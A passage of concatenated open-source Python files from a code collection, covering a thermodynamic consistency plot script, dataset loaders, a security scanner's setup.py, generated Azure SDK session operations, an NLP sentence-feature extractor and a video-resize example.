data.append(dict(cls="INCONSISTENT", type="update", in1=param1, val1=val1, in2=param2, val2=val2, x=x, y=y))
toc = time.time()
df = pandas.DataFrame(data)
bad = df[df.cls == 'INCONSISTENT']
good = df[df.cls == 'GOOD']
excep = df[df.cls == 'EXCEPTION']
badphase = df[df.cls == 'BAD_PHASE']
self.ax.plot(bad.x, bad.y, 'r+', ms=3)
self.ax.plot(good.x, good.y, 'k.', ms=1)
self.ax.plot(excep.x, excep.y, 'rx', ms=3)
self.ax.plot(badphase.x, badphase.y, 'o', ms=3, mfc='none')
print('2-phase took ' + str(toc - tic) + ' s for ' + self.pair)
def cross_out_axis(self):
xlims = self.ax.get_xlim()
ylims = self.ax.get_ylim()
self.ax.plot([xlims[0], xlims[1]], [ylims[0], ylims[1]], lw=3, c='r')
self.ax.plot([xlims[0], xlims[1]], [ylims[1], ylims[0]], lw=3, c='r')
xparam, yparam = split_pair_xy(self.pair)
x = 0.5 * xlims[0] + 0.5 * xlims[1]
y = 0.5 * ylims[0] + 0.5 * ylims[1]
if xparam in ['P', 'Dmolar']:
x = (xlims[0] * xlims[1])**0.5
if yparam in ['P', 'Dmolar']:
y = (ylims[0] * ylims[1])**0.5
self.ax.text(x, y, 'Not\nImplemented', ha='center', va='center', bbox=dict(fc='white'))
if __name__ == '__main__':
PVT = PdfPages('Consistency.pdf')
CP.CoolProp.set_debug_level(0)
    open('timelog.txt', 'w').close()  # truncate any previous log
with open('timelog.txt', 'a+', buffering=1) as fp:
for fluid in ['METHANOL']: # CP.__fluids__:
tic = timeit.default_timer()
skips = ['DmolarHmolar', 'DmolarSmolar', 'DmolarUmolar', 'HmolarSmolar']
skips = []
ff = ConsistencyFigure(fluid, backend='PCSAFT', additional_skips=skips) # , NT_1phase = 10, Np_1phase = 10, NT_2phase = 100, NQ_2phase = 0)
ff.to_csv('Errors' + fluid, sep=';')
# ff.errors.to_excel('Errors' + fluid + '.xlsx') # !!! uncomment
toc = timeit.default_timer()
print('Time to build:', toc - tic, 'seconds')
ff.add_to_pdf(PVT)
ff.savefig(fluid + '.png')
ff.savefig(fluid + '.pdf')
plt.close()
fp.write('Time to build: {0} seconds for {1}\n'.format(toc - tic, fluid))
del ff
PVT.close()
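# Marker legend for the consistency plots above, taken from the plotting calls:
# red '+' = inconsistent state, black '.' = consistent, red 'x' = exception raised,
# blue '*' = consistent but slow (> 10 ms, single-phase plot only),
# open circle = phase mismatch.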
|
examples/python/datasets/bunny.py | Willyzw/vdbfusion | 119 | 12690414 | <reponame>Willyzw/vdbfusion<gh_stars>100-1000
#!/usr/bin/env python3
import glob
import os
import numpy as np
import open3d as o3d
class BunnyDataset:
"""The bun.conf does not specify how to work with the trasnformation, after hours of tyring to
debug how to use it, I couldn't find how to use the 1996 dataset.
So I've created my own. Contact me if you feel curious on how I've obtianed it.
./mesh_to_dataset.py bunny.ply --scan-count 10
"""
def __init__(self, bunny_root, apply_pose: bool = True):
# Cache
self.use_cache = True
self.apply_pose = apply_pose
self.data_dir = os.path.join(bunny_root, "generated")
self.scan_dir = os.path.join(self.data_dir, "data/")
self.poses = self.load_bunny_poses()
self.scans = self.load_bunny_clouds()
assert len(self.scans) == len(self.poses)
def load_bunny_poses(self):
filename = os.path.join(self.data_dir, "poses.txt")
poses = np.loadtxt(filename).reshape(-1, 4, 4)
return poses
def load_bunny_clouds(self):
scans = []
scan_files = sorted(glob.glob(self.scan_dir + "*.ply"))
for scan_file in scan_files:
scan = o3d.io.read_point_cloud(scan_file)
scans.append(np.asarray(scan.points))
return scans
def __getitem__(self, idx):
return self.scans[idx], self.poses[idx]
def __len__(self):
return len(self.scans)
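# A minimal usage sketch (assumption: the generated dataset lives under ./bunny,
# i.e. ./bunny/generated/poses.txt and ./bunny/generated/data/*.ply exist):
#
#   dataset = BunnyDataset("./bunny")
#   for points, pose in dataset:
#       # points is an (N, 3) array of scan points, pose a 4x4 homogeneous transform
#       print(points.shape, pose.shape)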
|
setup.py | bbhunter/CORScanner | 767 | 12690436 | <filename>setup.py<gh_stars>100-1000
#!/usr/bin/env python
from setuptools import setup, find_packages
setup(
name='cors',
version='1.0.1',
description='Fast CORS misconfiguration vulnerabilities scanner',
long_description=open('README.md').read(),
long_description_content_type='text/markdown',
author='<NAME>',
author_email= '<EMAIL>',
url='http://github.com/chenjj/CORScanner',
project_urls={
'Bug Reports': 'https://github.com/chenjj/CORScanner/issues',
'Source': 'https://github.com/chenjj/CORScanner/',
},
license='MIT',
packages=find_packages(),
install_requires=['colorama', 'requests', 'argparse', 'gevent', 'tldextract', 'future', 'PySocks'],
include_package_data=True,
zip_safe=False,
# https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
'Development Status :: 4 - Beta',
'License :: OSI Approved :: MIT License',
'Natural Language :: English',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Environment :: Console',
'Topic :: Security',
],
entry_points={
'console_scripts': [
'cors = CORScanner.cors_scan:main',
],
},
)
|
sdk/servermanager/azure-mgmt-servermanager/azure/mgmt/servermanager/operations/session_operations.py | rsdoherty/azure-sdk-for-python | 2,728 | 12690438 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
import uuid
from msrest.pipeline import ClientRawResponse
from msrest.polling import LROPoller, NoPolling
from msrestazure.polling.arm_polling import ARMPolling
from .. import models
class SessionOperations(object):
"""SessionOperations operations.
:param client: Client for service requests.
:param config: Configuration of service client.
:param serializer: An object model serializer.
:param deserializer: An object model deserializer.
:ivar api_version: Client API Version. Constant value: "2016-07-01-preview".
"""
models = models
def __init__(self, client, config, serializer, deserializer):
self._client = client
self._serialize = serializer
self._deserialize = deserializer
self.api_version = "2016-07-01-preview"
self.config = config
def _create_initial(
self, resource_group_name, node_name, session, user_name=None, password=<PASSWORD>, retention_period=None, credential_data_format=None, encryption_certificate_thumbprint=None, custom_headers=None, raw=False, **operation_config):
session_parameters = models.SessionParameters(user_name=user_name, password=password, retention_period=retention_period, credential_data_format=credential_data_format, encryption_certificate_thumbprint=encryption_certificate_thumbprint)
# Construct URL
url = self.create.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', min_length=3, pattern=r'[a-zA-Z0-9]+'),
'nodeName': self._serialize.url("node_name", node_name, 'str', max_length=256, min_length=1, pattern=r'^[a-zA-Z0-9][a-zA-Z0-9_.-]*$'),
'session': self._serialize.url("session", session, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct body
body_content = self._serialize.body(session_parameters, 'SessionParameters')
# Construct and send request
request = self._client.put(url, query_parameters)
response = self._client.send(
request, header_parameters, body_content, stream=False, **operation_config)
if response.status_code not in [200, 201, 202]:
raise models.ErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('SessionResource', response)
if response.status_code == 201:
deserialized = self._deserialize('SessionResource', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
def create(
self, resource_group_name, node_name, session, user_name=None, password=<PASSWORD>, retention_period=None, credential_data_format=None, encryption_certificate_thumbprint=None, custom_headers=None, raw=False, polling=True, **operation_config):
"""Creates a session for a node.
:param resource_group_name: The resource group name uniquely
identifies the resource group within the user subscriptionId.
:type resource_group_name: str
:param node_name: The node name (256 characters maximum).
:type node_name: str
:param session: The sessionId from the user.
:type session: str
:param user_name: Encrypted User name to be used to connect to node.
:type user_name: str
:param password: Encrypted Password associated with user name.
:type password: str
:param retention_period: Session retention period. Possible values
include: 'Session', 'Persistent'
:type retention_period: str or
~azure.mgmt.servermanager.models.RetentionPeriod
:param credential_data_format: Credential data format. Possible values
include: 'RsaEncrypted'
:type credential_data_format: str or
~azure.mgmt.servermanager.models.CredentialDataFormat
:param encryption_certificate_thumbprint: Encryption certificate
thumbprint.
:type encryption_certificate_thumbprint: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: The poller return type is ClientRawResponse, the
direct response alongside the deserialized response
:param polling: True for ARMPolling, False for no polling, or a
polling object for personal polling strategy
:return: An instance of LROPoller that returns SessionResource or
ClientRawResponse<SessionResource> if raw==True
:rtype:
~msrestazure.azure_operation.AzureOperationPoller[~azure.mgmt.servermanager.models.SessionResource]
or
~msrestazure.azure_operation.AzureOperationPoller[~msrest.pipeline.ClientRawResponse[~azure.mgmt.servermanager.models.SessionResource]]
:raises:
:class:`ErrorException<azure.mgmt.servermanager.models.ErrorException>`
"""
raw_result = self._create_initial(
resource_group_name=resource_group_name,
node_name=node_name,
session=session,
user_name=user_name,
password=password,
retention_period=retention_period,
credential_data_format=credential_data_format,
encryption_certificate_thumbprint=encryption_certificate_thumbprint,
custom_headers=custom_headers,
raw=True,
**operation_config
)
def get_long_running_output(response):
deserialized = self._deserialize('SessionResource', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
lro_delay = operation_config.get(
'long_running_operation_timeout',
self.config.long_running_operation_timeout)
if polling is True: polling_method = ARMPolling(lro_delay, **operation_config)
elif polling is False: polling_method = NoPolling()
else: polling_method = polling
return LROPoller(self._client, raw_result, get_long_running_output, polling_method)
create.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ServerManagement/nodes/{nodeName}/sessions/{session}'}
def delete(
self, resource_group_name, node_name, session, custom_headers=None, raw=False, **operation_config):
"""Deletes a session for a node.
:param resource_group_name: The resource group name uniquely
identifies the resource group within the user subscriptionId.
:type resource_group_name: str
:param node_name: The node name (256 characters maximum).
:type node_name: str
:param session: The sessionId from the user.
:type session: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: None or ClientRawResponse if raw=true
:rtype: None or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorException<azure.mgmt.servermanager.models.ErrorException>`
"""
# Construct URL
url = self.delete.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', min_length=3, pattern=r'[a-zA-Z0-9]+'),
'nodeName': self._serialize.url("node_name", node_name, 'str', max_length=256, min_length=1, pattern=r'^[a-zA-Z0-9][a-zA-Z0-9_.-]*$'),
'session': self._serialize.url("session", session, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.delete(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200, 204]:
raise models.ErrorException(self._deserialize, response)
if raw:
client_raw_response = ClientRawResponse(None, response)
return client_raw_response
delete.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ServerManagement/nodes/{nodeName}/sessions/{session}'}
def get(
self, resource_group_name, node_name, session, custom_headers=None, raw=False, **operation_config):
"""Gets a session for a node.
:param resource_group_name: The resource group name uniquely
identifies the resource group within the user subscriptionId.
:type resource_group_name: str
:param node_name: The node name (256 characters maximum).
:type node_name: str
:param session: The sessionId from the user.
:type session: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: SessionResource or ClientRawResponse if raw=true
:rtype: ~azure.mgmt.servermanager.models.SessionResource or
~msrest.pipeline.ClientRawResponse
:raises:
:class:`ErrorException<azure.mgmt.servermanager.models.ErrorException>`
"""
# Construct URL
url = self.get.metadata['url']
path_format_arguments = {
'subscriptionId': self._serialize.url("self.config.subscription_id", self.config.subscription_id, 'str'),
'resourceGroupName': self._serialize.url("resource_group_name", resource_group_name, 'str', min_length=3, pattern=r'[a-zA-Z0-9]+'),
'nodeName': self._serialize.url("node_name", node_name, 'str', max_length=256, min_length=1, pattern=r'^[a-zA-Z0-9][a-zA-Z0-9_.-]*$'),
'session': self._serialize.url("session", session, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
query_parameters['api-version'] = self._serialize.query("self.api_version", self.api_version, 'str')
# Construct headers
header_parameters = {}
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if self.config.generate_client_request_id:
header_parameters['x-ms-client-request-id'] = str(uuid.uuid1())
if custom_headers:
header_parameters.update(custom_headers)
if self.config.accept_language is not None:
header_parameters['accept-language'] = self._serialize.header("self.config.accept_language", self.config.accept_language, 'str')
# Construct and send request
request = self._client.get(url, query_parameters)
response = self._client.send(request, header_parameters, stream=False, **operation_config)
if response.status_code not in [200]:
raise models.ErrorException(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('SessionResource', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get.metadata = {'url': '/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.ServerManagement/nodes/{nodeName}/sessions/{session}'}
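# A usage sketch (assumption: `client` is an authenticated service client that exposes
# these operations as `client.session`; names and values are illustrative only):
#
#   poller = client.session.create(
#       resource_group_name="my-rg",
#       node_name="my-node",
#       session="my-session-id",
#       user_name=encrypted_user,
#       password=encrypted_password,
#   )
#   session_resource = poller.result()  # blocks until the long-running operation completes
#   client.session.delete("my-rg", "my-node", "my-session-id")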
|
mmpose/datasets/datasets/fashion/__init__.py | jlgzb/mmpose | 367 | 12690454 | <reponame>jlgzb/mmpose
from .deepfashion_dataset import DeepFashionDataset
__all__ = ['DeepFashionDataset']
|
armi/cli/cleanTemps.py | keckler/armi | 162 | 12690466 | # Copyright 2019 TerraPower, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from armi import context
from armi.cli.entryPoint import EntryPoint
class CleanTemps(EntryPoint):
"""
Delete all temp directories created by any ARMI run.
Useful for occasionally cleaning temporary dirs from crashed runs.
.. warning:: This will break any ongoing runs.
"""
name = "clean-temps"
def invoke(self):
context.cleanTempDirs(olderThanDays=0)
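# Typically reached through the ARMI command line (sketch):
#
#   $ armi clean-temps
#
# which constructs this entry point and calls invoke().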
|
model_zoo/evaluater.py | ModelZoo/ModelZoo | 191 | 12690476 | from model_zoo.logger import get_logger
from model_zoo.utils import load_config, load_model, find_model_class
from absl import flags
# ========== Checkpoint ================
flags.DEFINE_string('checkpoint_dir', 'checkpoints', help='Checkpoint dir', allow_override=True)
flags.DEFINE_string('checkpoint_name', 'model.ckpt', help='Checkpoint file name', allow_override=True)
# ========== Log System ================
flags.DEFINE_bool('log_enable', True, help='Whether to enable Log System', allow_override=True)
flags.DEFINE_string('log_level', 'DEBUG', help='Log Level', allow_override=True)
flags.DEFINE_string('log_rotation', '100MB', help='Log file rotation', allow_override=True)
flags.DEFINE_string('log_retention', None, help='Log file retention', allow_override=True)
flags.DEFINE_string('log_format', '{time} - {level} - {module} - {file} - {message}', help='Log record format',
allow_override=True)
flags.DEFINE_string('log_folder', './logs/', help='Folder of log file', allow_override=True)
flags.DEFINE_string('log_file', 'evaluate.log', help='Name of log file', allow_override=True)
flags.DEFINE_string('log_path', '', help='File path of log file', allow_override=True)
class BaseEvaluater(object):
"""
    Base Evaluater; subclasses must implement the data() method to supply evaluation data.
"""
def __init__(self):
"""
        the model class is resolved later in run() from the checkpoint configuration
"""
self.config = flags.FLAGS.flag_values_dict()
# get logger
logger = get_logger(self.config)
self.logger = logger
def data(self):
"""
you need to implement this method
:return:
"""
raise NotImplementedError
def run(self, **kwargs):
"""
        start evaluating
:return:
"""
# prepare data
self.eval_data = self.data()
# split data
x_eval, y_eval = self.eval_data
# init configs from checkpoints json file and flags
config = load_config(self.config)
# init model class
model_class_name, model_file_name = config.get('model_class_name'), config.get('model_file_name')
self.model_class = find_model_class(model_class_name, model_file_name)
# init model
model = self.model_class(config=config)
model.logger = self.logger
self.logger.info(f'initialize model logger {model.logger} of {model}')
# restore model
load_model(model, self.config.get('checkpoint_dir'), self.config.get('checkpoint_name'))
# evaluate
return model.evaluate(x_eval, y_eval, **kwargs)
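# A minimal subclass sketch (load_my_arrays is a hypothetical helper; the model class
# itself is resolved from the checkpoint configuration inside run()):
#
#   class MyEvaluater(BaseEvaluater):
#       def data(self):
#           x_eval, y_eval = load_my_arrays()  # hypothetical data loader
#           return x_eval, y_eval
#
#   MyEvaluater().run()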
|
features.py | Umesh-01/NavigateMe | 145 | 12690508 | # pass in a sentence, pass out it's features
import nltk
import pandas as pd
import sys
import hashlib
import re
import string
import itertools
from nltk import word_tokenize
from nltk.corpus import stopwords
import logging
import logger_config
log = logging.getLogger(__name__)
log.info("Entered module: %s" % __name__)
lemma = nltk.wordnet.WordNetLemmatizer()
sno = nltk.stem.SnowballStemmer("english")
line = [
"xxx",
"Oracle 12.2 will be released for on-premises users on 15 March 2017",
0,
"S",
]
pos = [] # list of PartsOfSpeech
output = "" # comma separated string
header = "" # string for describing features header
VerbCombos = ["VB", "VBD", "VBG", "VBN", "VBP", "VBZ", "WDT", "WP", "WP$", "WRB", "MD"]
questionTriples = [
"CD-VB-VBN",
"MD-PRP-VB",
"MD-VB-CD",
"NN-IN-DT",
"PRP-VB-PRP",
"PRP-WP-NNP",
"VB-CD-VB",
"VB-PRP-WP",
"VBZ-DT-NN",
"WP-VBZ-DT",
"WP-VBZ-NNP",
"WRB-MD-VB",
]
statementTriples = [
"DT-JJ-NN",
"DT-NN-VBZ",
"DT-NNP-NNP",
"IN-DT-NN",
"IN-NN-NNS",
"MD-VB-VBN",
"NNP-IN-NNP",
"NNP-NNP-NNP",
"NNP-VBZ-DT",
"NNP-VBZ-NNP",
"NNS-IN-DT",
"VB-VBN-IN",
"VBZ-DT-JJ",
]
startTuples = ["NNS-DT", "WP-VBZ", "WRB-MD"]
endTuples = ["IN-NN", "VB-VBN", "VBZ-NNP"]
"""Because python dict's return key-vals in random order, provide ordered
list to pass to ML models"""
feature_keys = [
"id",
"wordCount",
"stemmedCount",
"stemmedEndNN",
"CD",
"NN",
"NNP",
"NNPS",
"NNS",
"PRP",
"VBG",
"VBZ",
"startTuple0",
"endTuple0",
"endTuple1",
"endTuple2",
"verbBeforeNoun",
"qMark",
"qVerbCombo",
"qTripleScore",
"sTripleScore",
"class",
]
@logger_config.logger
def strip_sentence(sentence):
sentence = sentence.strip(",")
sentence = "".join(filter(lambda x: x in string.printable, sentence))
    # strip out non-printable characters
sentence = sentence.translate(str.maketrans("", "", string.punctuation))
# strip punctuation
return sentence
@logger_config.logger
def exists_pair_combos(comboCheckList, sentence):
pos = get_pos(sentence)
tag_string = "-".join([i[1] for i in pos])
combo_list = []
for pair in itertools.permutations(comboCheckList, 2):
if pair[0] == "MD": # Kludge - strip off leading MD
pair = ["", ""]
combo_list.append("-".join(pair))
if any(code in tag_string for code in combo_list):
return 1
else:
return 0
@logger_config.logger
# Parts Of Speech
def get_pos(sentence):
sentenceParsed = word_tokenize(sentence)
return nltk.pos_tag(sentenceParsed)
@logger_config.logger
# Count Q-Marks
def count_qmark(sentence):
return sentence.count("?")
@logger_config.logger
# Count a specific POS-Type
# VBG = count_POSType(pos,'VBG')
def count_POSType(pos, ptype):
tags = [i[1] for i in pos]
return tags.count(ptype)
# if ptype in tags:
# VBG = 1
# return(VBG)
@logger_config.logger
# Does Verb occur before first Noun
def exists_vb_before_nn(pos):
pos_tags = [i[1] for i in pos]
# Strip the Verbs to all just "V"
pos_tags = [re.sub(r"V.*", "V", str) for str in pos_tags]
# Strip the Nouns to all just "NN"
pos_tags = [re.sub(r"NN.*", "NN", str) for str in pos_tags]
vi = 99
ni = 99
mi = 99
# Get first NN index
if "NN" in pos_tags:
ni = pos_tags.index("NN")
# Get first V index
if "V" in pos_tags:
vi = pos_tags.index("V")
# get Modal Index
if "MD" in pos_tags:
mi = pos_tags.index("MD")
if vi < ni or mi < ni:
return 1
else:
return 0
@logger_config.logger
# Stemmed sentence ends in "NN-NN"?
def exists_stemmed_end_NN(stemmed):
stemmedEndNN = 0
stemmed_end = get_first_last_tuples(" ".join(stemmed))[1]
if stemmed_end == "NN-NN":
stemmedEndNN = 1
return stemmedEndNN
@logger_config.logger
# Go through the predefined list of start-tuples, 1 / 0 if given startTuple occurs in the list
def exists_startTuple(startTuple):
exists_startTuples = []
for tstring in startTuples: # startTuples defined as global var
if startTuple in tstring:
exists_startTuples.append(1)
else:
exists_startTuples.append(0)
return exists_startTuples
@logger_config.logger
# Go through the predefined list of end-tuples, 1 / 0 if given Tuple occurs in the list
def exists_endTuple(endTuple):
exists_endTuples = []
for tstring in endTuples: # endTuples defined as global var
if endTuple in tstring:
exists_endTuples.append(1)
else:
exists_endTuples.append(0)
return exists_endTuples
@logger_config.logger
# loop round list of triples and construct a list of binary 1/0 vals if triples occur in list
def exists_triples(triples, tripleSet):
exists = []
for tstring in tripleSet:
if tstring in triples:
exists.append(1)
else:
exists.append(0)
return exists
@logger_config.logger
# Get a sentence and spit out the POS triples
def get_triples(pos):
list_of_triple_strings = []
pos = [i[1] for i in pos] # extract the 2nd element of the POS tuples in list
n = len(pos)
if n > 2: # need to have three items
for i in range(0, n - 2):
t = "-".join(
pos[i : i + 3] # noqa: E203
) # pull out 3 list item from counter, convert to string
list_of_triple_strings.append(t)
return list_of_triple_strings
@logger_config.logger
def get_first_last_tuples(sentence):
first_last_tuples = []
sentenceParsed = word_tokenize(sentence)
pos = nltk.pos_tag(sentenceParsed) # Parts Of Speech
pos = [i[1] for i in pos] # extract the 2nd element of the POS tuples in list
n = len(pos)
first = ""
last = ""
if n > 1: # need to have three items
first = "-".join(pos[0:2]) # pull out first 2 list items
last = "-".join(pos[-2:]) # pull out last 2 list items
first_last_tuples = [first, last]
return first_last_tuples
@logger_config.logger
def lemmatize(sentence):
"""
    pass in a sentence as a string, return just the core text that has
    been lemmatised; stop words are removed - this could affect the ability to detect
    whether this is a question or an answer - depends on import
lemma = nltk.wordnet.WordNetLemmatizer()
and from nltk.corpus import stopwords
"""
stop_words = set(stopwords.words("english"))
word_tokens = word_tokenize(sentence)
filtered_sentence = []
for w in word_tokens:
if w not in stop_words:
filtered_sentence.append(w.lower()) # also set lowercase
lem = []
for w in filtered_sentence:
lem.append(lemma.lemmatize(w))
return lem
@logger_config.logger
def stematize(sentence):
"""
    pass in a sentence as a string, return just the core text, stemmed;
    stop words are removed - this could affect the ability to detect whether this is a
    question or an answer - depends on import
sno = nltk.stem.SnowballStemmer('english')
and from nltk.corpus import stopwords
"""
stop_words = set(stopwords.words("english"))
word_tokens = word_tokenize(sentence)
filtered_sentence = []
for w in word_tokens:
if w not in stop_words:
filtered_sentence.append(w)
stemmed = []
for w in filtered_sentence:
stemmed.append(sno.stem(w))
return stemmed
#########################################################################
# A wrapper function to put it all together - build a csv line to return
# A header string is also returned for optional use
def get_string(id, sentence, c="X"):
header, output = "", ""
pos = get_pos(sentence)
qMark = count_qmark(sentence) # count Qmarks before stripping punctuation
sentence = strip_sentence(sentence)
# lemmed = lemmatize(sentence)
stemmed = stematize(sentence)
wordCount = len(sentence.split())
stemmedCount = len(stemmed)
qVerbCombo = exists_pair_combos(VerbCombos, sentence)
verbBeforeNoun = exists_vb_before_nn(pos)
output = (
id
+ ","
+ str(wordCount)
+ ","
+ str(stemmedCount)
+ ","
+ str(qVerbCombo)
+ ","
+ str(qMark)
+ ","
+ str(verbBeforeNoun)
)
header = header + "id,wordCount,stemmedCount,qVerbCombo,qMark,verbBeforeNoun"
# list of POS-TYPES to count , generate a list of counts in the CSV line
for ptype in ["VBG", "VBZ", "NNP", "NN", "NNS", "NNPS", "PRP", "CD"]:
output = output + "," + str(count_POSType(pos, ptype))
header = header + "," + ptype
output = output + "," + str(exists_stemmed_end_NN(stemmed))
header = header + ",StemmedEndNN,"
# get Start Tuples and End Tuples Features ##
startTuple, endTuple = get_first_last_tuples(sentence)
list1 = exists_startTuple(startTuple) # list [1/0] for exists / not exists
output = output + "," + ",".join(str(i) for i in list1)
for i in range(0, len(list1)):
header = header + "startTuple" + str(i + 1) + ","
list1 = exists_endTuple(endTuple) # list [1/0] for exists / not exists
output = output + "," + ",".join(str(i) for i in list1)
for i in range(0, len(list1)):
header = header + "endTuple" + str(i + 1) + ","
# look for special Triple Combinations ##
triples = get_triples(pos) # all the triple sequences in the sentence POS list
list1 = exists_triples(triples, questionTriples)
total = sum(list1)
output = output + "," + str(total)
header = header + "qTripleScore" + ","
list1 = exists_triples(triples, statementTriples)
total = sum(list1)
output = output + "," + str(total)
header = header + "sTripleScore" + ","
output = output + "," + c # Class Type on end
header = header + "class"
return output, header
# End of Get String wrapper
@logger_config.logger
# Build a dictionary of features
def features_dict(id, sentence, c="X"):
features = {}
pos = get_pos(sentence)
features["id"] = id
features["qMark"] = count_qmark(
sentence
) # count Qmarks before stripping punctuation
sentence = strip_sentence(sentence)
stemmed = stematize(sentence)
startTuple, endTuple = get_first_last_tuples(sentence)
features["wordCount"] = len(sentence.split())
features["stemmedCount"] = len(stemmed)
features["qVerbCombo"] = exists_pair_combos(VerbCombos, sentence)
features["verbBeforeNoun"] = exists_vb_before_nn(pos)
for ptype in ["VBG", "VBZ", "NNP", "NN", "NNS", "NNPS", "PRP", "CD"]:
features[ptype] = count_POSType(pos, ptype)
features["stemmedEndNN"] = exists_stemmed_end_NN(stemmed)
list1 = exists_startTuple(startTuple) # list [1/0] for exists / not exists
for i in range(0, len(list1)):
features["startTuple" + str(i)] = list1[i]
list1 = exists_endTuple(endTuple) # list [1/0] for exists / not exists
for i in range(0, len(list1)):
features["endTuple" + str(i)] = list1[i]
# look for special Triple Combinations ##
triples = get_triples(pos) # all the triple sequences in the sentence POS list
list1 = exists_triples(
triples, questionTriples
) # a list of 1/0 for hits on this triple-set
features["qTripleScore"] = sum(
list1
) # add all the triple matches up to get a score
list1 = exists_triples(
triples, statementTriples
) # Do same check for the Statement t-set
features["sTripleScore"] = sum(
list1
) # add all the triple matches up to get a score
features["class"] = c # Class Type on end
return features
@logger_config.logger
# pass in dict, get back series
def features_series(features_dict):
values = []
for key in feature_keys:
values.append(features_dict[key])
features_series = pd.Series(values)
return features_series
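# A small usage sketch (values shown are illustrative):
#
#   feats = features_dict("abc123", "What time does the train leave?")
#   row = features_series(feats)   # values ordered according to feature_keys
#   # e.g. feats["qMark"] == 1, feats["wordCount"] == 6, feats["class"] == "X"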
# MAIN ##
if __name__ == "__main__":
"""ID, WordCount, StemmedCount, Qmark, VBG, StemmedEnd, StartTuples,
EndTuples, QuestionTriples, StatementTriples, Class
[1/0] [NN-NN?] [3 x binary] [3 x binary] [10 x binary] [10 x binary]"""
logging.debug("Starting...")
c = "X" # Dummy class
header = ""
output = ""
if len(sys.argv) > 1:
sentence = sys.argv[1]
else:
sentence = line[1]
id = hashlib.md5(str(sentence).encode("utf-8")).hexdigest()[:16]
features = features_dict(id, sentence, c)
pos = get_pos(sentence) # NLTK Parts Of Speech, duplicated just for the printout
logging.debug(pos)
logging.debug(features)
    for key, value in features.items():
        logging.debug("%s: %s", key, value)
# header string
for key, value in features.items():
header = header + ", " + key # keys come out in a random order
output = output + ", " + str(value)
header = header[1:] # strip the first ","" off
output = output[1:] # strip the first ","" off
logging.debug("HEADER:", header)
logging.debug("VALUES:", output)
|
example_video_smart_resize.py | viddik13/katna | 125 | 12690523 | <filename>example_video_smart_resize.py
import os
import os.path
import cv2
from Katna.video import Video
import multiprocessing
import Katna.config as app_config
# change these paths
# usually autoflip build is located here : /mediapipe/repo/bazel-build/mediapipe/examples/desktop/autoflip
# usually mediapipe model is located here : /mediapipe/repo/mediapipe/models
autoflip_build_path = "/path/to/autoflip/build"
autoflip_model_path = "/path/to/mediapipe/models"
# output aspect ratio
aspect_ratio = "9:16"
# get the current configuration
conf = app_config.MediaPipe.AutoFlip.get_conf()
# set True for features which are required in output
conf["ENFORCE_FEATURES"] = {
"FACE_CORE_LANDMARKS": False,
"FACE_ALL_LANDMARKS": False,
"FACE_FULL": False,
"HUMAN": False,
"PET": False,
"CAR": False,
"OBJECT": False
}
# stabilization threshold (%)
conf["STABALIZATION_THRESHOLD"] = 0.5
# opacity of blur area
conf["BLUR_AREA_OPACITY"] = 0.6
def main_folder():
dir_path = file_path = os.path.join(".", "tests", "data")
# will create a resize_result dir inside data folder and dump videos there
